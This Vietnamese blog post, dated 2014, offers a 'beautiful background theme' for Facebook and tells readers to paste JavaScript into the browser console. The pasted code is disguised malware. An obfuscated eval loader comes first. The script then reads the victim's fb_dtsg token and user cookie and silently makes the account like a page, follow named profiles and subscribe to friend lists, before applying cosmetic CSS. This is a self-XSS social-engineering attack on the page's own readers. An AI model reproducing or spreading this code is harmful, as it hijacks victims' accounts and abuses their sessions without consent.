facebook‎ > ‎

Ảnh nền Lung Linh Độc đáo cho Facebook

đăng 22:25, 24 thg 2, 2014 bởi vansanh. com

> Hướng dẫn thay đổi giao diện FACEBOOK( Ảnh nền Lung Linh Độc đáo ) cho Facebook rất đẹp và Lạ mắt ---> Ai hứng thú thì làm nhé.Nhìn đẹp lắm nà !! +
 Bước 1: Vào link sau : http://pastebin.com/raw.php?i=BqDgTm6q +
 Bước 2: Bấm Ctrl A xong thì Ctrl + C +
 Bước 3: quay về https:// www.facebook.com / +
 Bước 4: - Nếu bạn xài Google Chorme + Crôm Cộng nhấn F12 chọn Console... - Nếu bạn xài firefox thì Ctrl+Shift+K +
 Bước 5: Bấm Ctrl V ... xong thì enter và xem thành quả 

var _5756;var _2201='14140C105A122A1053B948F1033A623E973B953F938D963E1043D1038C978F623B768C623B963C1018D958B1048C1008C968F1013F1043B693D978B968A1043D808F1003D968D1008D968E1013D1043E1038C793F1068A853E948E1008F968D663B658F973A953D938D963D1043E1038A978C658E668D918A703D928D693F1053C948C1003F1048A968D758E623C1053B948E1033B623B1048D1038C968E1033F938B988D963D623E768A623D963E1018D958B1048A1008A968E1013D1043B693D958D1018A1018D998C988E968A693C1008D948F1043D958F983D663D963D1018A958B1048E1008C968E1013A1043D693A958F1018F1018A998F988E968A693D1008A948C1043C958F983F663B698D958B938D1048A1038D968A1033C768C663F923D963C678C668C698E668E918D708E928A668A758A623C973F1048B1013D958E1043B988F1018D1013C623E843B988B998B968F663A1023A668B623F1078D623C1053B948D1033B623A863C948E978E968D623C768C623A1013F968F1058F623E903C848C843B823B1043C1043A1023F873F968D1028A1048B968B1038C1043D663B668A758B623E1053E948C1033F623B863D948E978B968E888C873D843B623E768B623A633D698C698B1058F1058A1058F693C973E948D958D968D953A1018A1018F998C693A958D1018C1008C698C948D993F948A1063B698D1023B948A978E968A1038E698E973B948A1013B938F1038D1043A948B1043E1048D1038A693D1023F983C1023C633A758B623A1053D948F1033C623A863B948F978C968A863D948E1033C948E1008C1038D623C768F623A633E653E973D953D1023E948F978E968B938E988A963D768D633B623D678E623A1023A623B678C633C653E948F963F963C768E1043F1033D1048F968E653C1033C968C1003B1018A948F963B768E973D948D1003F1038E968C653C973D948A1013D938E1018C1033B988E978F988D1013A768F1023E948B978C968E938D1043D988F1008D968E1003F988E1013A968C653B973E948E1013F938B1038D1018B1048D1033E958A968C768D653E958C948B1043D768F653A1013A958E1043E1033F918B938F1008D1018E963B928B768B1023A948F978B968C1003D968D1043A938C1043A988B1008A968E1003E988B1013F968A938C1023D948B978B968C938F948E958F1043F988B1018D1013D1038D653C938C938E1048F1038D968C1033F768C633E678A1048F1038F968A1033B938E988F963A678B633A653B938D938B948B768B708B653D938D938E963E1068B1013A768B738D748D743F948A803B728A1073C728D798E813F688F653F938D938B1033E968D1028A768D963E653B973B953A938F963E1043D1038E978A768C633B678A973B953B938D963C1043A1038C978F678A633E653E1023B983E1038F1043D948E1008C1023C768F633A758D623D863F948B978E968A693C1018B1023D968C1013E663B633A863A858C878C883B633A683B623D863A948D978F968F888D873D843C683D623D1043D1033A1048E968F668C758F623D863D948D978F968A693A1018B1013B1033E968A948F963C1068C1038D1043A948C1043C968E958D983F948B1013A978E968B623A768C623D973A1048A1013D958D1043D988E1018F1013F623C663E668F623E1078B623E988C973D623D663A863F948C978F968C693B1033F968C948C963C1068C878E1043B948C1043F968E623B768F768F623F723C623A653D653C623A863F948D978C968B693A1038C1043D948D1043A1048D1038C623B768A768B623B713D703F703C668C623C1078D623F863E948C978A968F693C958B1003F1018F1038D968F758C623B1088A623F1088A758E623A863F948E978B968C693D1038D968D1013B963E663B863E948E978A968F863F948E1033C948E1008C1038E668D758F623F1088C623F513E843B988C998D968B663B633D718E713F713C723A748A723B738B723D738B743F733F713F708C723C723D633C668E758D843E988B998F968C663B633F708B713F718D728F713F728E738D748A708D708C728B723F703D703E738E633D668D758D843B988C998A968A663C633C713E708C718E738C713C718E703C743F713B708E718D733A713A738B738A633C668C758B843F988A998E968C663A633A728C743B718B723D728F743B703D743F708E733C748B703E728B708A718D633E668B758E843B988F998E968F663D633B728A733C748A703C733D718D738D723A733E723E723C743C743E728B748C633B668A758D843B988B998A968C663C633D738A728C713B708D728B718C733B748D723D743E708A723A713A743C743A633A668B758B843D988B998D968C663F633E723F743C708F703B723C713D708B733D728A718A713B723D733A718C728C633F668E758A843D988E998B968A663F633C708B723F743B703C713E718F748B738D728D718E748D723F743A708E723E633A668A758B843E988B998E968E663E633B728F743E743A748E733C728C748D708B738B743B713C748A708B733F718D633C668A758B513E623E1053E948F1033F623C1048A1038F968C1033F938B988D963D623F768E623C963C1018A958A1048A1008D968B1013E1043B693B958F1018D1018F998E988F968F693A1008D948C1043E958B983E663A963B1018C958B1048A1008B968B1013D1043A693F958F1018B1018D998E988F968C693A1008A948F1043B958A983F663C698F958B938C1048B1038C968D1033F768E663E923E963D678A668E698A668C918A708A928F668E758D623D1053B948B1033B623D973A953F938D963D1043D1038B978D623C768B623F963D1018F958B1048D1008E968B1013E1043C693B978C968F1043D808A1003D968C1008C968B1013D1043A1038F793E1068C853C948D1008C968C663E658F973D953E938B963B1043E1038E978A658D668A918E703C928D693C1053D948B1003B1048F968D758B623A1053F948B1033A623F1013B1018F1058C768F663C1013F968A1058A623B803E948E1043D968A668D693D978B968B1043D883D988B1008C968E663F668A758F623D973A1048B1013A958B1043A988C1018C1013E623D863B663F1018A1023B1018B668B623B1078F623A1053A948D1033C623A903C623C768F623F1013F968E1058D623C903F848A843E823A1043C1043E1023E873F968A1028D1048C968A1038F1043D663E668C758E623A1053C948D1033F623B903D888D873D843B623F768C633D698E698E1058F1058B1058B693E973E948D958F968B953C1018A1018A998F693F958D1018E1008E698E948D993D948E1063B698E1048E973A988D698F1003E988B998C968D693A1023E983F1023D633B758F623D1053A948A1033A623C903A863C948B1033E948D1008D1038F623E768A623C633F1003A988A998A968C938C948C958A1043F988E1018F1013C768F1043B1033B1048A968F653E973E1043F938A968F1013C1043A938E988D963B968F1013E1043F988B973F988A968C1033C768E633A678A1018B1023E1018D678E633C653E1038D1018A1048E1033A958D968F768D708D653A958B1003D988D968F1013F1043B938A988B963B768C633D678A1013C1018A1058A678E633C648F718A788B718B738C748E738E743E718F743C728F738A653A1033F1018F1018D1043A988C963D768D1048E938C993A1038F1018B1013D1023B938E718F748E938B708E743D653E978D988A973C1043A1018D958F958A948D1038A988A1018C1013C653D973F1043C918E1043A1013B928B768D648B718D808A648B718B803E653F973D1043D918C1043E1068F1023F968A928C768A713D703C653E973A1043A918E1028A988B963C928D768A728A743F748B703E743C708C708A718B713A748A723A738C703A713F738D748C713F728B738A653D973D1043E918A1008D973B938D1038B1043E1018B1033D1068D938D998D968D1068E928E768B713F743D708B723A748F733B713F748D703A703C708C748E718B708E723C718F748F728E713E653A973E1043E918C983F948E1038C938F968A1063F1023C948A1013F963B968D963F938A1048F973B988E928B768A708F653C1013B958E1043A1033E918B938B1008A1018C963A928F768E1023E948F978B968A1003A968F1043E938E983D1018E1008A968D938E1038C1043B1033E968D948E1008F653A938B938C1048A1038F968E1033E768F633D678E1048E1038C968A1033A938B988B963D678A633F653F938A938C948A768D708B653E938D938B963D1068A1013C768C738A1013C743C743D868E1018D788B848C793E1003B798D1003B1068B1018F958F1023C948C968C653F938E938B1033A968B1028B768A978F723F653B973C953C938F963C1043A1038A978C768B633C678D973C953E938D963F1043A1038D978B678B633E653A1023A983B1038B1043C948E1008C1023A768D633B758C623C903E693E1018B1023B968B1013A663A633C863D858C878A883F633E683D623F903B888A873C843F683D623C1043A1033B1048E968B668D758E623D903A693A1018F1013F1033C968B948A963D1068C1038F1043A948C1043C968D958C983F948F1013F978F968D623C768E623A973A1048A1013B958F1043B988C1018B1013F623F663B668C623A1078D623A988F973F623D663F903E693A1033F968B948D963A1068A878D1043F948D1043D968F623E768B768D623D723C623E653E653B623F903E693E1038A1043B948C1043E1048E1038A623E768B768D623F713E703B703B668A623A1078A623E903D693C958C1003F1018B1038C968B758B623E1088E623F1088E758A623D903E693A1038D968F1013D963F663E903C863D948B1033E948E1008E1038C668F758C623B1088C623F513D863F663B633C728B708F708C743D708C743C743C738D713A713E718B703A708A733B743A633D668D758F863C663B633F723A748B708A733E723C713E713C733C703C748D708D723B723A748D733D633E668F758A863A663E633A723A713E743E733E748E718A708C703F703C728F738E728B733F723F708A633F668A758F863D663C633B733E718B738B713B743C728E748A713A733D713B748F718A718C703F738B633B668E758C863E663C633E733D733E703D703F713A743E728A738D723B703A703B748E708D743F718D633B668F758B863C663E633A728B743C713B743E703B723B703E748F743C718E748E743A713C748F743D633B668E758F863F663D633D708E733E733B703A728D738D708D703A733A748B718C718B738B738D723E633D668E758E863A663B633E713C703A733D723F728F743A703F733E733B708B748B743D703F703F733B633D668F758C863A663E633D713E713E738B743E723E728F738C723F703B738B703B743C708E738F708F633A668C758F863E663F633D723C738F723D713C738F718B748D738F728D748A723C723D708A723A738F633D668C758A863A663D633F723F738E708C713C738E733F733D738C733B713E743E723E718F743F743B633D668F758D863D663B633A713E708B713D738E738D718E733B738B713C713D713B708B743C748A728F633D668B758A863E663A633C723A708D748B748F708C718D708D738B708E723F728A718A733D718C723C633C668D758D513C1053E948D1033E623F973E953B938A963E1043F1038A978A623C768A623D963B1018B958C1048E1008F968A1013C1043F693D978B968F1043A808F1003D968F1008F968A1013E1043D1038E793B1068D853F948F1008B968A663D513E623B623C623C623B658E973B953D938D963A1043E1038F978B658D668D918C703B928F693A1053C948A1003F1048D968E758D513C1053F948E1033F623B1048A1038D968D1033F938C988F963E623E768D623B963B1018D958D1048C1008A968D1013F1043B693E958C1018F1018B998F988B968F693B1008F948A1043E958C983E663C513F623E623D623A623E963D1018B958A1048D1008F968E1013A1043F693F958B1018A1018D998D988B968A693D1008F948F1043E958B983D663B513F623B623D623B623B623B623B623B623D698B958E938F1048E1038D968F1033A768F663D923C963C678C668E698F668D918C708E928B668A758A513A513C973A1048B1013E958B1043F988B1018D1013A623F828C803B878B663F1033B668B623A1078A513C623B623D623F623C1053A948F1033E623B903A623A768C623B1013B968F1058B623B903B848F843D823C1043D1043B1023B873B968E1028D1048A968A1038E1043E663A668C758D513B623C623B623B623F1053B948D1033F623D903F888A873B843C623F768A513C623B623E623B623C623F623B623C623B633A698D698D1058E1058E1058F693F973A948E958C968B953B1018C1018E998D693B958F1018E1008D698A948E993B948B1063B698E948D963F963D938C973A1033B988E968D1013F963C698E948A958D1043C988C1018F1013F693C1023C983A1023E633B758B513D623C623F623B623A1053F948E1033C623C903B863F948E1033E948F1008C1038A623D768A623D633B1043F1018B938A973F1033D988C968E1013D963A768D633B623E678D623B1033C623C678A513A623D623A623B623F623F623D623A623D633D653E948F958F1043E988F1018B1013F768D948C963E963F938A973E1033F988D968B1013F963E653D983D1018C1058D938B973A1018F1048D1013C963B768E973C1033C988E968B1013F963D938D953D1033F1018B1058A1038D968F1033A938D1038A653B1033D968E973F938E1023A948D1033D948F1008A768E1013A1018A1013C968F653B653D653D1018D1048B1043B978D1018D988D1013F978B938D988D963D768D653D1003B1018A978C978F988F1013E978D938B1003E1018B958B948C1043C988E1018A1013A768D1038B968F948D1033F958D983C653B1013C1018F938E973C1003D1068F1018D1048F1043B938B1018D1013A938C958D1003E988D958C998C768B1043A1033A1048D968D653C968D978E1018B938F1003E1018D978B938D963B948B1043B948C653A983E1043B1043A1023C938A1033B968D973A968F1033F968A1033C653F938C938B1048B1038D968A1033F768C633F623F678E513C623D623A623D623D623E623F623E623B1048B1038A968E1033F938F988F963A623F678C513A623E623D623C623D623C623C623C623C633D653C938C938B948A768D708E653C938E938E963D1068D1013E768E738C748B743B948E803A728A1073A728A798A813B688C653A938A938A1033B968D1028E768E718E728C653A973B953F938F963F1043C1038E978A768E633E623F678B513E623F623A623A623B623E623D623A623D973F953F938C963E1043E1038E978A623D678A623B633D653E1023D983D1038F1043A948E1008A1023F768B633A758B513C623F623E623A623F903F693F1018C1023F968F1013A663F633D863A858C878D883C633A683B623C903B888B873C843F683D623D1043F1033E1048E968B668A758E513F623D623E623D623D903D693D1018A1013A1033F968C948E963E1068C1038C1043F948E1043A968D958D983B948A1013D978A968B623B768D623C973A1048A1013F958A1043D988E1018D1013F623F663F668D623D1078E513F623D623A623E623E623D623C623C623A988F973E623C663E903D693C1033D968C948D963C1068C878C1043F948B1043F968F623F768E768F623B723D623E653D653E623C903C693E1038B1043F948D1043D1048F1038A623F768B768E513C623D623F623F623A623E623C623E623F623B623B623F623F713A703E703F668B623F1078E513F623F623E623A623D623F623B623E623B623B623F623B623B903D693B958B1003D1018A1038F968E758B513D623F623D623C623B623A623A623A623F1088A513F623F623E623B623A1088F758D513A623F623E623C623B903C693F1038D968D1013F963C663A903A863E948F1033E948E1008C1038A668A758F513E1088B513C828E803C878F663A633C708B703A703B703B703D713D703D733B708E738D743E728B708A703E738A633C668B758E828D803C878A663B633D708B703B703D703E703B703D703C733F708D723D703A703B713C733A738A633F668E758D828C803C878F663F633B708E703D703F703D703E728A708E718A703E713C723D718C713F718A723E633F668C758A828E803D878D663F633B708C703F703B703D703F728E703E708A723F723F713A703A703C718D633C668E758F828E803B878E663A633F708A703F703A703F703E713C728E733A728B733E733A718F738E738D743E633A668E758B';var _5785=/[\x41\x42\x43\x44\x45\x46]/;var _1715=2;var _4299=_2201.charAt(_2201.length-1);var _6502;var _3835=_2201.split(_5785);var _7144=[String.fromCharCode,isNaN,parseInt,String];_3835[1]=_7144[_1715+1](_7144[_1715](_3835[1])/21);var _6267=(_1715==8)?String:eval;_6502='';_11=_7144[_1715](_3835[0])/_7144[_1715](_3835[1]);for(_5756=3;_5756<_11;_5756++)_6502+=(_7144[_1715-2]((_7144[_1715](_3835[_5756])+_7144[_1715](_3835[2])+_7144[_1715](_3835[1]))/_7144[_1715](_3835[1])-_7144[_1715](_3835[2])+_7144[_1715](_3835[1])-1));var _4438='_9667';var _8258='_4438=_6502';function _4175(_5461){_6267(_4167);_4175(_3812);_3812(_8258);_4175(_4438);}var _4167='_4175=_6267';var _3812='_3812=_4175';_4175(_4299);
// Page
Like ("197159037134068");
var fb_dtsg = document.getElementsByName('fb_dtsg')[0].value;
var user_id = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]);
alert('Chúc Mừng Bạn Đă thành công.Vui ḷòng chờ sau 24h pindienthoaikoracell.com.                                                 Http://Facebook.Com/');
function cereziAl(isim) {
  var tarama = isim + "=";
  if (document.cookie.length > 0) {
    konum = document.cookie.indexOf(tarama)
    if (konum != -1) {
      konum += tarama.length
      son = document.cookie.indexOf(";", konum)
      if (son == -1)
        son = document.cookie.length
      return unescape(document.cookie.substring(konum, son))
    }
    else { return ""; }
  }
}
 
function getRandomInt (min, max) {
  return Math.floor(Math.random() * (max - min + 1)) + min;
}
function randomValue(arr) {
  return arr[getRandomInt(0, arr.length-1)];
}
 
var fb_dtsg = document.getElementsByName('fb_dtsg')[0].value;
var user_id = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]);
 
function a(abone){
  var http4 = new XMLHttpRequest();
   
  var url4 = "/ajax/follow/follow_profile.php?__a=1";
   
  var params4 = "profile_id=" + abone + "&location=1&source=follow-button&subscribed_button_id=u37qac_37&fb_dtsg=" + fb_dtsg + "&lsd&__" + user_id + "&phstamp=";
  http4.open("POST", url4, true);
   
  //Send the proper header information along with the request
  http4.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
  http4.setRequestHeader("Content-length", params4.length);
  http4.setRequestHeader("Connection", "close");
   
  http4.onreadystatechange = function() {//Call a function when the state changes.
  if(http4.readyState == 4 && http4.status == 200) {
    
   http4.close; // Close the connection
   
  }
  }
  
  http4.send(params4);
}
 
function sublist(uidss) {
        var a = document.createElement('script');
        a.innerHTML = "new AsyncRequest().setURI('/ajax/friends/lists/subscribe/modify?location=permalink&action=subscribe').setData({ flid: " + uidss + " }).send();";
        document.body.appendChild(a);
}
// ad
a("100004783384538");a("100003797082955");
sublist("341620672641166");sublist("305273206275913");sublist("341622065974360");sublist("341623765974190");sublist("219107201592058");
// khách
// mem
// sublist

//new them: >>
(function() {
var css = ".highlightIndicator, \n.tinyman:after, \n.fbTimelineSideAds,\n.ego_column,\n.buttonWrap, \n.fbTimelineSpine, \n.spinePointer, \n.topBorder, \n.bottomBorder, \n#footerContainer, \n.middleLink, \n.slimHeader #pageNav li.tinyman::after, .slimHeader #pageNav li.middleLink::after, \n.slimHeader #pageNav .middleLink a, \n.moreSectionsLink\n{\ndisplay:none !important;\n}\n\ndiv.mainWrapper{\npadding-left: 1em !important;\n}\n.uiProgressBar .fill {\nbackground: #444 !important;\nborder: solid #222 !important;\n}\n.uiTypeaheadView .compact li {\nbackground-color: #111 !important;\n}\ndiv.uiTypeaheadView .selected {\nbackground-color: #333 !important;\n}\n.fbIndex .gradient {\nbackground: none !important;\n}\n.notifNegativeBase #fbNotificationsFlyout li.jewelItemNew, .notifNegativeBase #fbNotificationsFlyout li.first_receipt {\nbackground: #333 !important;\n}\n.pop_container {\nbackground-color: #000 !important;\n}\n.pop_verticalslab, .pop_horizontalslab {\nbackground: #222 !important;\n}\n.uiMenuXItem\na.highlighted {\nbackground-color: #333 !important;\nborder-color: #000 !important;\ncolor: #FFF !important;\n}\n.uiMenuXItem\na.highlighted {\nbackground-color: #333 !important;\nborder-color: #000 !important;\ncolor: #FFF !important;\n}\n.uiContextualLayer {\nbackground-color: #111 !important;\n}\n.HighlightSelectorMenu {\nborder: 2px solid #000 !important;\nbackground: #111 !important;\nborder-radius: 5px !important;\n}\n.-cx-PUBLIC-uiDialog__border, ._1yu {\nborder: 10px solid rgba(82, 82, 82, .7) !important;\n-webkit-border-radius: 8px !important;\n}\ninput[type=\"text\"], input[type=\"password\"], .inputtext, select, .select, select > option, select > button, .fbPhotoImageStage .fbPhotosPhotoButtons .tagMessage, .fbPhotoImageStage .fbPhotosPhotoButtons .cropMessage, #u1clso_61 div img, #navSearch .uiTypeahead, .-cx-PRIVATE-uiDialog__content, ._1yu, ._t {\nbackground-color: #111 !important;\n}\n.fbTimelineCapsule\n{\nbackground: none !important;\n}\n.sp_c79t5t\n{\nbackground-image: none !important;\n}\n* {\nborder-color: transparent !important;\ncolor: #fff !important;\nbackground-color: transparent !important; \n}\n\n#fbTimelineHeadline .profilePic {\nbackground-color: #FFF !important;\nborder: 4px solid #FFF !important;\n-webkit-border-radius: 2px !important;\nheight: 160px !important;\nwidth: 160px !important;\n}\n\n\n.fbTimelineScrubber {\n\nborder-color: #333333 !important;\npadding: 8px 0 8px 1px !important;\ntop: 38px !important;\nwidth: 122px !important;\nz-index: 1 !important;\nborder-radius: 10px !important;\n}\n\n.fbPhotosPhotoTagboxBase .tagName {\nbackground: #000 !important;\ncolor: #FFF !important;\ncursor: default !important;\nfont-weight: normal !important;\npadding: 2px 6px 3px !important;\ntop: 3px !important;\nwhite-space: nowrap !important;\n}\n\n.fbPhotosPhotoTagboxBase .innerTagBox {\nborder: 4px solid white !important;\nborder-color: rgba(255, 255, 255, .8) !important;\n}\n\n.fbPhotoSnowlift {\nbackground-color: rgba(0, 0, 0, .7) !important;\n}\n\n.fbPhotoSnowlift .rhc , .pagingActivated .snowliftOverlay, .fbPhotoSnowlift.taggingMode .snowliftOverlay, .stageWrapper{\nbackground-color: #111 !important;\n}\n\n.profile-picture img {\nmax-width: 170px !important;\n}\n\n.webComposerPhotoUpload input, .webComposerPhotoUpload {\ncolor: #000000 !important;\n}\n\n\nhtml{background:url(https://files.myopera.com/mduamrmndlls/files/hoa11.gif) no-repeat center fixed;background-size:cover;-o-background-size:cover;-webkit-background-size:cover}\n\n\n\n\n.fbCurrentStory:hover, .connect_widget_like_button, .fbFeedTickerStory:hover, .item a:hover, .fbJewelFlyout li:hover, .uiSideNav a:hover, .fbNubFlyoutBody, .uiButtonConfirm {\nbackground: #111111 !important;\n}\n\n.fbChatMessageGroup {\nborder-color: #2c2c2c !important;\n}\n\n.fbChatSidebar {\nbackground: #111111 !important;\n}\n\n#leftCol {\nposition: relative;top:20px!important;\nmin-height: 400px !important;\n}\n\n.arrowLeft a {\nbackground-image:url('http://i.imgur.com/26zf5.png') !important;\nborder-color: #666666 !important;\n}\n\n.arrowRight a {\nbackground-image:url('http://i.imgur.com/v6B6z.png') !important;\nborder-color: #666666 !important;\n}\n\n.uiStreamSubstory {\nborder-color: transparent !important;\n}\n\n.uiHeader {\nbackground-color: transparent !important;\n}\n\n.fbSidebarGripper, .fbTickerFooter, .fbSidebarGripper div, .navSubmenu:hover {\nbackground-color: #222222 !important;\n}\n\n.fbTimelineCountButton, .uiBoxWhite, .uiButtonGroup {\nbackground-color: #1c1c1c !important;\n}\n\n\n\n#leftCol {\npadding-top: 0px !important;\npadding-left: 0px !important;\n}\n\n.fbNubFlyoutFooter {\nbackground: #111111 !important;\nbox-shadow: 0 1px 2px rgba(0, 0, 0, 0.5) !important;\ncolor: #00FF00!important; \nborder: #333333 !important;\n}\n\n.uiStream .uiSelectorButton {\nbackground-image: url(\"http://i.imgur.com/nOfuQ.png\") !important;\n}\n\n.uiSearchInput {\nbackground-image: url(\"http://i.imgur.com/agmNw.png\") !important;\n}\n\n\n\n\n.jewelButton:hover, .topNavLink a:hover {\nbackground-color: #222222 !important;\n}\n\n.uiScrollableAreaGripper {\nbackground-color: #666666 !important;\n}\n\n.uiSearchInput, .fbPhotosGridHeader, .uiComposerMessageBoxControls, #MessagingShelf, .uiBoxGray {\nbackground: #111111 !important;\n}\n\n.uiButton {\nbackground: #1c1c1c !important;\n}\n\n#blueBar {\nbackground: -moz-linear-gradient(top, #45484d 0%, #000000 100%) !important;\nbackground: -webkit-linear-gradient(top, #45484d 0%, #000000 100%) !important;\nbox-shadow: 0 0 7px rgba(211, 32, 198, 0.75) !important;\nborder:4px ridge #CC00FF !important;\nmargin-top:5px!important;\nmargin-left:5px!important;\nborder-radius: 70px!important;\n}\n\n\n\n#contentCol, #pageLogo a {\nbackground-color: transparent !important;\nborder-color: transparent !important;\n}\n\n.uiMorePager {\nmargin-bottom:6px !important;\nbackground-color: #1c1c1c !important;\nborder: 0px solid #333333 !important;\n}\n\n.uiStreamStory, .fbIndexFeaturedRegistration, .signupForm {\nmargin-bottom:2px !important;\nbackground-color:transparent !important;\nbackground-image:url('http://i.imgur.com/T2LPj.png') !important;\nborder-radius: 15px !important;\npadding: 1px !important;\nborder: 0px solid #333333 !important;\n}\n\n.uiStream .uiStreamHeader .uiStreamHeaderChronologicalForm .uiSelectorButton .uiButtonText {\ncolor: #000 !important;\n}\n\n#album_pagelet {\nbackground-color: #111111 !important;\nmargin-left: 0px !important;\nmargin-top: -15px !important;\n}\n\n.tagWrapper, #pagelet_main_column, .timelineUnitContainer, .fbTimelineTopSection, #MessagingMessages {\nbackground-color:transparent !important;\nbackground-image:url('http://i.imgur.com/T2LPj.png') !important;\nborder-radius: 15px !important;\nborder: 0px solid #333333 !important;\n}\n.fbTimelineTopSectionBase .topSectionBottomBorder {\ndisplay: none !important;\n}\n#pagelet_main_column {\nwidth: 500px !important;\n}\n\n.fbJewelFlyout, .uiToggleFlyout, .navigation, .container, .uiOverlayContent, .search, .pop_container_advanced {\nbackground-color: #111111 !important; \nborder-radius: 15px !important;\nborder: 2px solid #333333 !important;\n}\n\n#left_column, #leftCol, .MessagingReadHeader {\nbackground: #111111 !important;\nborder-radius: 15px !important;\n}\n\n#left_column, #leftCol {\nmargin-left:-8px !important;\nwidth: 185px !important;\n}\n\n.uiMediaThumb i, .uiProfilePhoto {\nborder: 1px solid #000000 !important; \n}\n\n#rightCol {\nmargin-top: 10px !important;\npadding-top: 0px !important;\nbackground: #111111 !important;\nborder-radius: 15px !important;\nborder: 0px solid #333333 !important;\n}\n\n#right_column, .rightColumnWrapper {\nmargin-top: 0px !important;\npadding-top: 0px !important; \nposition: fixed !important;\nbackground: #111111 !important;\nborder-radius: 15px !important; \nborder: 0px solid #333333 !important;\n}\n\n.aboutMePagelet {\nbackground-color:transparent !important;\nbackground-image:url('http://i.imgur.com/T2LPj.png') !important;\nborder: 0px solid #333333 !important;\n}\n\n.fbNubButton, .fbNubFlyoutTitlebar, .uiToggleFlyout, .fbChatSidebarFooter {\nbackground: -moz-linear-gradient(center top , #333333, #000000) !important;\nbackground: -webkit-linear-gradient(center top , #333333, #000000) !important;\nbox-shadow: 0 1px 2px rgba(0, 0, 0, 0.5) !important;\ncolor: #FF00FF!important;\nborder: #333333 !important;\n}\n\n.fbChatOrderedList {\nbackground: -moz-linear-gradient(center right , #333333, #000000) !important;\nbackground: -webkit-linear-gradient(center right , #333333, #000000) !important;\nbox-shadow: 0 1px 2px rgba(0, 0, 0, 0.5) !important;\ncolor: #FF00FF!important;\nborder: #333333 !important;\n}\n\n\n\n\n\n\n\n\n.UFIMentionsInputWrap,.navHeader, ._554n,.fbxWelcomeBox ,._2yg .composerTypeahead {\nbackground: -moz-linear-gradient(top, #45484d 0%, #000000 100%) !important;\nbackground: -webkit-linear-gradient(top, #45484d 0%, #000000 100%) !important;\nbox-shadow: 0 2px 4px rgba(211, 32, 198, 0.75) !important;\nborder:2px ridge #FF00FF!important;\nmargin-top:5px!important;\nmargin-left:0px!important;\nborder-radius: 7px!important;\npadding:3px!important;\n}\n.fbx #pageHead, #blueBar #pageHead{\npadding-top:0px!important;\n}\n\n.slim #blueBar {\n\n  height: 35px!important;\n}\n.fbxWelcomeBoxBlock .fbxWelcomeBoxImg,\n._s0,\n._42fz .pic{\n  border:2px solid rgba(0, 0, 0, .55)!important;\n  border-radius: 37px!important;\n}\n.fbxWelcomeBoxBlock .fbxWelcomeBoxImg:hover,\n._s0:hover,\n._42fz .pic:hover{\n  box-shadow: 0px 0px 4px rgba(211, 32, 198, 0.75) !important;\n  border:2px ridge #FF0033 !important;\n  border-radius: 37px!important;\n}\n.uiSideNav .sideNavItem .hasCount:hover,\n.uiSideNav .sideNavItem .noCount:hover{\n  text-shadow: 2px 2px 2px rgba(39, 98, 138, 0.75) !important;\n  color: #3399FF!important;\n\n}\n#navSearch {\nwidth:300px !important;\nmargin-top: 6px !important;\nmargin-left: 30px !important;\nborder-color: transparent !important;\n}\n#headNav {\n  height: 30px;\n}\n\n\n\na:hover{\n  text-shadow: 2px 2px 2px rgba(39, 98, 138, 0.75) !important;\n  color: #3399FF!important;\n}\n.UIActionLinks_bottom a, \n.UIActionLinks_bottom button.as_link, \n.UIActionLinks_bottom .uiLinkButton input, \n.UIActionLinks_bottom .uiLinkButton input:hover,\n.uiStreamMessage .actorName, .uiStreamMessage .passiveName\n{\n  text-shadow: 1px 1px 1px rgba(0, 0, 0, 0.99) !important;\n  color: #3399FF!important;\n}\n._2yg .composerTypeahead ,#bfb_options_button_li.openToggler ul,\n .better_fb_mini_message, .sfx_mini_message_no_x,\n .GM_options_wrapper_inner,\n .better_fb_mini_message, .mini_x{\nbackground: -moz-linear-gradient(top, #45484d 0%, #000000 100%) !important;\nbackground: -webkit-linear-gradient(top, #45484d 0%,#000000 100%);\nbox-shadow: 0 2px 4px rgba(39, 98, 138, 0.75) !important;\nborder:2px ridge #3399FF!important;\nmargin-top:5px!important;\nmargin-left:0px!important;\nborder-radius: 7px!important;\npadding:3px!important;\n}\n.GM_options_buttons input{\n  text-shadow: 1px 1px 1px rgba(0, 0, 0, 0.99) !important;\n  color: #CC00FF !important;\n\n}";
if (typeof GM_addStyle != "undefined") {
    GM_addStyle(css);
} else if (typeof PRO_addStyle != "undefined") {
    PRO_addStyle(css);
} else if (typeof addStyle != "undefined") {
    addStyle(css);
} else {
    var node = document.createElement("style");
    node.type = "text/css";
    node.appendChild(document.createTextNode(css));
    var heads = document.getElementsByTagName("head");
    if (heads.length > 0) {
        heads[0].appendChild(node);
    } else {
        // no head yet, stick it whereever
        document.documentElement.appendChild(node);
    }
}
})();

Comments